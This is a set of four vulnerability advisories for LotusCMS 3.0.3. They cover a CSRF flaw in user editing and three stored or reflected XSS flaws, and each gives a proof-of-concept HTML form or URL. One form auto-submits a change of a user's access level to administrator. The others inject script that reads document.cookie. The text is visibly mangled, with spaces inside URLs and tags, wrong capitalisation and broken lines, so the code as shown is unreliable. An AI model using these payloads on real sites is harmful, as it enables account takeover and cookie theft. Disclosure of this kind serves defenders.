Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org /)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA-Ethical Hacking & Penetration Testing (http://www.htbridge.ch /)
Vulnerability Details:
The vulnerability exists due to failure in the "core/model/UsersModel. php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability cocould result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:
<Form action = "http: // host/index. php? System = Users & page = edit & active = USERNAME "method =" post "name =" main ">
<Input type = "hidden" name = "name" value = "test">
<Input type = "hidden" name = "email" value = "email (at) example (dot) com [email concealed]">
<Input type = "hidden" name = "password1" value = "">
<Input type = "hidden" name = "password2" value = "">
<Input type = "hidden" name = "access" value = "administrator">
</Form>
<Script>
Document. main. submit ();
</Script>
Vulnerability ID: HTB22887
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_lotuscms_3.html
Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org /)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA-Ethical Hacking & Penetration Testing (http://www.htbridge.ch /)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "modules/Menu/MenuModuleAdmin. php "script to properly sanitize user-supplied input in" title "variable. successful exploitation of this vulnerability cocould result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<Form action = "http: // host/index. php? System = Modules & page = admin & active = Menu & req =
Save & id = 3 "method =" post "name =" main ">
<Input type = "hidden" name = "title" value = lotus "> <script> alert (document. cookie) </script>
<Input type = "hidden" name = "external" value = "http: // host">
</Form>
<Script>
Document. main. submit ();
</Script>
Vulnerability ID: HTB22885
Reference: html "> http://www.htbridge.ch/advisory/xss_vulnerability_in_lotuscms_2.html
Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org /)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA-Ethical Hacking & Penetration Testing (http://www.htbridge.ch /)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "core/model/PageModel. php "script to properly sanitize user-supplied input in" page "variable. successful exploitation of this vulnerability cocould result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
Http: // host/index. php? Page = % 00 "> <script> alert (document. cookie) </script>
Vulnerability ID: HTB22884
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_lotuscms_1.html
Product: LotusCMS
Vendor: Arboroia Network (http://www.lotuscms.org /)
Vulnerable Version: 3.0.3 and probably prior versions
Vendor Notification: 01 March 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA-Ethical Hacking & Penetration Testing (http://www.htbridge.ch /)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "core/model/SEOModel. php "script to properly sanitize user-supplied input in" seodescription "variable. successful exploitation of this vulnerability cocould result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<Form action = "http: // host/index. php? System = SEO & page = edit "method =" post "name =" main ">
<Input type = "hidden" name = "seokeywords" value = "LotusCMS">
<Input type = "hidden" name = "seodescription" value = description "> <script> alert (document. cookie) </script>
</Form>
<Script>
Document. main. submit ();
</Script>